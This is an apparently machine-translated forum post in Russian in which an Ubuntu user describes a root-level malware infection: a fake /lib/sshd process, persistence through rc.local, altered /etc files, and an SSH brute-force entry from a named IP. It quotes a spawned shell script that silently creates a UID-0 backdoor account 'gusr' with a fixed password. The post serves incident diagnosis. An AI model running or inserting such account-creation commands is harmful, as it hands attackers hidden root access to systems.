Я совершенно уверен, что мой ноутбук Ubuntu 13.10 заражен каким-то вредоносным ПО.
Время от времени я нахожу процесс / lib / sshd (принадлежащий root) работающим и потребляющим много процессора. Это не сервер sshd, который запускает / usr / sbin / sshd.
Двоичный файл имеет разрешения --wxrw-rwt и генерирует и порождает сценарии в каталоге / lib. Недавний называется 13959730401387633604, и он делает следующее
#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd
Пользователь gusr был создан вредоносной программой независимо друг от друга, а затем chpasswd зависает, потребляя 100% ресурсов процессора.
До сих пор я обнаружил, что пользователь gusr был дополнительно добавлен в файлы в / etc /
/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid
Похоже, что вредоносная программа сделала копии всех этих файлов с суффиксом "-". Полный список файлов / etc /, которые были изменены пользователем root, доступен здесь .
Кроме того, файл / etc / hosts был изменен на this .
/ Lib / sshd начинается с добавления себя в конец файла /etc/init.d/rc.local!
Я удалил пользователя, удалил файлы, убил дерево обработанных, изменил мои пароли и удалил открытые ключи ssh.
Я знаю, что я в основном облажался, и я, скорее всего, переустановить всю систему. Тем не менее, поскольку я подключаюсь к нескольким другим машинам, было бы хорошо, по крайней мере, попытаться удалить его и выяснить, как я его получил. Будем благодарны за любые предложения о том, как это сделать.
Похоже, что они вошли 25 марта путем принудительного входа в систему root. Я понятия не имел, что root ssh по умолчанию включен в Ubuntu. Я отключил это и поднял denyhosts.
Логин был от 59.188.247.236, где-то в Гонконге, видимо.
Я получил ноутбук от EmperorLinux, и они включили root-доступ. Если у вас есть один из них, и вы используете sshd, будьте осторожны.
Linux/Ebury
. Это что-то еще, и, возможно, имя не назначено. Ebury не создавал бы новую учетную запись пользователя и изменил бы общую библиотеку, используемую openssh, а не был добавлен в новый двоичный файл с именем sshd.